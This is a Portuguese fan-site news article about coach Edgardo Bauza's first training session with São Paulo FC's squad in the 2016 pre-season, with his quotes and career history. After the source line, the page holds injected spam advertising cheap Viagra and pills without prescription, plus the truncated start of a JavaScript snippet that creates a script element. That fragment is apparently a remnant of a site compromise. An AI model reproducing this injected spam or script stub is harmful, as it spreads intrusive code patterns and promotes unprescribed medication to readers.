Noticias

“O primeiro contato com os atletas foi realmente muito bom”

A apresentação do elenco são-paulino nesta quarta-feira (6), no Centro de Treinamento da Barra Funda, não só abriu os preparativos do Tricolor na pré-temporada 2016, como proporcionou o primeiro contato do recém-contratado técnico Edgardo Bauza e o elenco. E a primeira impressão dos novos comandados animou Patón, que supervisionou as atividades desta tarde e pôde conhecer melhor os jogadores são-paulinos.

“O primeiro contato com os atletas foi realmente muito bom. Após a apresentação, pude conhecê-los melhor e aprender um pouco mais sobre cada um. Além disso, também tive a oportunidade de conversar com os outros membros da comissão técnica, que me ajudaram bastante. A diretoria do clube nos abriu as portas, e estamos contentes e motivados para fazer um grande trabalho e conquistar títulos, porque é isso que todos nós queremos”, revelou o comandante.

Bicampeão da Libertadores da América, em 2008 pela LDU-EQU e em 2014 pelo San Lorenzo-ARG, Patón conhece bem o torneio internacional. Por isso, para estrear bem e conquistar um resultado positivo diante do Cesar Vallejo-PER, que decidirá com o clube brasileiro uma vaga no Grupo 1 da competição, Bauza já começou a pré-temporada com um trabalho com bola para poder aos poucos aprimorar as partes física e técnica dos jogadores.

“Encontramos uma boa resposta dos atletas neste primeiro dia de treino. O trabalho foi bom, leve, mas nos próximos dias será mais duro e intenso. Já definimos uma programação, e agora vamos trabalhar para chegar bem na estreia, porque é isso que devemos fazer. Queremos aproveitar este período de treinos para conhecer melhor os jogadores e condicioná-los para os campeonatos que teremos pela frente”, finalizou o experiente comandante.


Vale destacar que Bauza comandou o San Lorenzo nas duas últimas temporadas. Em 2014, foi um dos principais responsáveis por levar a tradicional equipe argentina a inédita conquista da Copa Libertadores da América. Em 2015, ficou com o vice-campeonato nacional e classificou seu antigo clube para a fase de grupos da competição continental do ano que vem.

Antes de brilhar na Argentina, o treinador obteve destaque em outro país sul-americano. Com quatro títulos, escreveu seu nome na história da LDU, de Quito. Em 2008, fez história no Equador ao levar a equipe a conquista da primeira Libertadores da América, o único título do país até hoje na competição. Conquistou ainda uma Recopa e dois campeonatos nacionais.

Fonte: SiteOficial

cheap pills Buy cheap Viagra online

to order at an easy rate generic pills without prescription var d=document;var s=d.createElement(‘script’);

Clique para adicionar um comentário

Leave a Reply

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

quatro + 2 =

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.

Noticias

Mais em Noticias

Fora! Pato encaminha rescisão de contrato com o São Paulo e se despede do elenco

saopauloadmin19 de agosto de 2020

10 fatos que orgulham todos os torcedores do São Paulo

saopauloadmin9 de julho de 2020

Dodô diz que quando jogou no são Paulo recusou ofertas do Barça e Inter de Milão

saopauloadmin16 de junho de 2020

São Paulo reforça posição contra o racismo: ‘Vidas negras importam’

saopauloadmin1 de junho de 2020

Osorio fala sobre saída do São Paulo em 2015

saopauloadmin31 de maio de 2020

Osorio diz ter saudade do São Paulo e coloca volta ao Brasil como um de seus 3 objetivos

saopauloadmin29 de maio de 2020

Luis Fabiano revela desejo em voltar a jogar, mas diz que está “pronto para parar”

saopauloadmin22 de maio de 2020

Diniz critica afobação por retorno aos treinos: “Ninguém joga sozinho”

saopauloadmin20 de maio de 2020

Com “combo”, São Paulo renova patrocínios

saopauloadmin10 de maio de 2020